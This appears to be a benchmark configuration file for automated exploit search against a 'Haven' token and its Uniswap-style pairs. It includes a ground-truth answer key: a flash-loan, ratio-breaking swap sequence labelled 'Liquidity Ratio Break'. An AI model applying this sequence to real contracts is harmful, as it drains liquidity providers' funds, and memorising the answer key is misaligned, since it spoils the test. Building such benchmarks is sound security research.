# Information for benchmarks building.
project_name: "Haven"

ctrt_name2cls:
  - ["busd", "BUSD"]
  - ["wbnb", "WBNB"]
  - ["haven", "Haven"]
  - ["pairbw", "UniswapV2Pair"]
  - ["pairbh", "UniswapV2Pair"]
  - ["pairhw", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

ctrt_name2deploy:
  - ["busd", ""]
  - ["wbnb", ""]
  - ["haven", "new Haven()"]
  - ["pairbw", ""]
  - ["pairbh", ""]
  - ["pairhw", ""]
  - ["factory", ""]
  - ["router", ""]

extra_actions:
  - "function swap_pairhw_haven_haven_wbnb(uint256 amount, uint256 amountOut) internal eurus {
    haven.transfer(address(pairbh), 0);
    }"

extra_deployments: 
  - "haven.afterDeploy(address(router), address(pairhw), address(wbnb));"
extra_statements: []

attack_goal_str: "wbnb;1e6"

groundtruth:
  - ["borrow", "wbnb", "owner", "0x6f05b59d3b20000"]
  - ["swap", "pairhw", "haven", "haven", "wbnb", "1", "1"]
  - ["swap", "pairhw", "attacker", "wbnb", "haven", "0xde0b6b3a764000", "0x10d9e630e3b"]
  - ["swap", "pairbh", "attacker", "haven", "busd", "0xea7bb7545d", "0xe54f93491895b800"]
  - ["swap", "pairbw", "attacker", "busd", "wbnb", "0xe54f93491895b800", "0xe4fbc69449f200"]
  - ["payback", "wbnb", "owner", "0x6f05b59d3b20000 * 1003 / 1000"]

# Information for search space building.
roles:
  "wbnb":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "busd":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "haven":
    is_asset: true
    is_erc20: true
    is_stablecoin: false

  "pairbw":
    is_swappair: true
    is_uniswap: true
    token_pair: ["busd", "wbnb"]
    support_swaps:
      "wbnb": ["busd", "wbnb"]
      "busd": ["busd", "wbnb"]
    is_oracle: true
    oracle: "pairbw"

  "pairbh":
    is_swappair: true
    is_uniswap: true
    token_pair: ["busd", "haven"]
    support_swaps:
      "haven": ["busd", "haven"]
      "busd": ["busd", "haven"]
    is_oracle: true
    oracle: "pairbh"

  "pairhw":
    is_swappair: true
    is_uniswap: true
    token_pair: ["haven", "wbnb"]
    support_swaps:
      "haven": ["haven", "wbnb"]
      "wbnb": ["haven", "wbnb"]
    is_oracle: true
    oracle: "pairhw"

pattern: "Liquidity Ratio Break"
